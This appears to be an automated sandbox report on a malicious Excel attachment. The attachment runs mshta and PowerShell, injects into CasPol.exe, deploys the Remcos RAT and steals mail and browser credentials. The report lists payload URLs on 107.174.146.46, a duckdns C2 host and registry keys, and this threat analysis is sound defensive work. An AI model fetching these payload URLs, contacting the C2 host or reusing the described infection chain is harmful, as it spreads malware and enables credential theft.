Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail

Tries to steal Mail credentials (via file registry)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: ESMTPPassword	41_2_004033F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword	41_2_00402DB3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword	41_2_00402DB3

Yara detected WebBrowserPassView password recovery tool

Source: Yara match

File source: Process Memory Space: CasPol.exe PID: 3900, type: MEMORYSTR

Remote Access Functionality

Detected Remcos RAT

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Mutex created: \Sessions\1\BaseNamedObjects\Rmc-RXIGCE

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.162.95	acesso.run	United States	13335	CLOUDFLARENETUS	false
104.21.74.191	unknown	United States	13335	CLOUDFLARENETUS	false
107.174.146.46	unknown	United States	36352	AS-COLOCROSSINGUS	true
107.175.130.20	seemebest2024rmc.duckdns.org	United States	36352	AS-COLOCROSSINGUS	true
142.250.184.206	drive.google.com	United States	15169	GOOGLEUS	false
172.217.16.193	unknown	United States	15169	GOOGLEUS	false
178.237.33.50	geoplugin.net	Netherlands	8455	ATOM86-ASATOM86NL	false
142.250.185.65	drive.usercontent.google.com	United States	15169	GOOGLEUS	false

Contacted Domains

Name	IP	Active
acesso.run	172.67.162.95	true
geoplugin.net	178.237.33.50	true
drive.google.com	142.250.184.206	true
drive.usercontent.google.com	142.250.185.65	true
seemebest2024rmc.duckdns.org	107.175.130.20	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://acesso.run/KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrain	false		unknown
http://107.174.146.46/57/picturewithgreatnewswithgoodthingsonbestplace.tIF	true		unknown
http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.hta	true		unknown
http://107.174.146.46/57/RFGGVFRR.txt	true		unknown
http://geoplugin.net/json.gp	false	URL Reputation: safe	unknown

AV Detection

Multi AV Scanner detection for submitted file

Source: A & C Metrology OC 545714677889Materiale.xls

ReversingLabs: Detection: 21%

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 31_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,

31_2_00404423

Phishing

Yara detected HtmlPhish44

Source: Yara match

File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ernashgetmebackwithgoodnewswhichgrreatthings[1].hta, type: DROPPED

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.22:49166 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.22:49167 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.22:49173 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.22:49175 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 172.67.162.95:443 -> 192.168.2.22:49161 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.74.191:443 -> 192.168.2.22:49163 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.74.191:443 -> 192.168.2.22:49171 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.74.191:443 -> 192.168.2.22:49170 version: TLS 1.2

Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\xcygtrxb\xcygtrxb.pdbhP source: powershell.exe, 00000005.00000002.426757676.00000000023EA000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\revod450\revod450.pdb source: powershell.exe, 00000012.00000002.477548914.000000000266C000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\xcygtrxb\xcygtrxb.pdb source: powershell.exe, 00000005.00000002.426757676.00000000023EA000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\revod450\revod450.pdbhP source: powershell.exe, 00000012.00000002.477548914.000000000266C000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_0040AE51 FindFirstFileW,FindNextFileW,	31_2_0040AE51
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 41_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,	41_2_00407EF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 42_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,	42_2_00407898

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Temp\bthgghdjthgdlvyictcnxlwgz
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Temp\qqcnootpfzoqahkwlihmmg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Temp\owwdnwiorrwlyboscy
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\mshta.exe

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Potential document exploit detected (performs DNS queries)

Source: global traffic	DNS query: name: acesso.run
Source: global traffic	DNS query: name: acesso.run
Source: global traffic	DNS query: name: drive.google.com
Source: global traffic	DNS query: name: drive.usercontent.google.com
Source: global traffic	DNS query: name: acesso.run
Source: global traffic	DNS query: name: drive.google.com
Source: global traffic	DNS query: name: drive.usercontent.google.com
Source: global traffic	DNS query: name: seemebest2024rmc.duckdns.org
Source: global traffic	DNS query: name: seemebest2024rmc.duckdns.org
Source: global traffic	DNS query: name: geoplugin.net

Potential document exploit detected (performs HTTP gets)

Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.162.95:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.250.184.206:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 172.67.162.95:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 142.250.184.206:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 178.237.33.50:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.162.95:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.162.95:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.162.95:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.162.95:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.162.95:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.162.95:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.162.95:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.162.95:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.162.95:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.162.95:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.250.184.206:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.250.184.206:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.250.184.206:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.250.184.206:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.250.184.206:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.250.184.206:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.250.184.206:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.250.184.206:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.250.184.206:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 172.67.162.95:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 172.67.162.95:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 172.67.162.95:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 172.67.162.95:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 172.67.162.95:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 172.67.162.95:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 172.67.162.95:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 172.67.162.95:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 172.67.162.95:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
